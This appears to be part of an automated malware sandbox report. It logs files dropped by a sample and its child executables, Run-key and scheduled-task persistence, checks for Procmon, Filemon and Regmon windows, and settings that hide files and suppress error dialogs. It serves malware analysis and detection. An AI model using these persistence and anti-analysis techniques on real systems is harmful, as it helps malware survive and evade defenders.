                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\freebl3[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\_ctypes.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeFile created: C:\Program Files\Windows Media Player\graph\graph.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\_bz2.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[3].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\libffi-7.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeFile created: C:\Users\user\AppData\Local\Temp\9D01A5Jfed0VtJf6\Y-Cleaner.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\t5abhIx[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\ucrtbase.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\_socket.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\nss3[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\mozglue[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\vcruntime140[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1014445001\182555961e.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeFile created: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\_hashlib.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\VCRUNTIME140.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1014443001\9774053d4c.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[2].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1014446001\799e7330b8.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\dwVrTdy[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeFile created: C:\Users\user\AppData\Local\Temp\9D01A5Jfed0VtJf6\Bunifu_UI_v1.5.3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3417.tmp.vvv.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\unicodedata.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\softokn3[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\dll[1]Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\soft[1]Jump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 602c785fe5.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9774053d4c.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d8d3046b98.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Services
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeRegistry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run GraphJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeWindow searched: window name: Filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeWindow searched: window name: Filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 602c785fe5.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 602c785fe5.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d8d3046b98.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d8d3046b98.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9774053d4c.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9774053d4c.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GraphJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GraphJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeRegistry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run GraphJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeRegistry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run GraphJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Services
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Services

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\audiodg.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
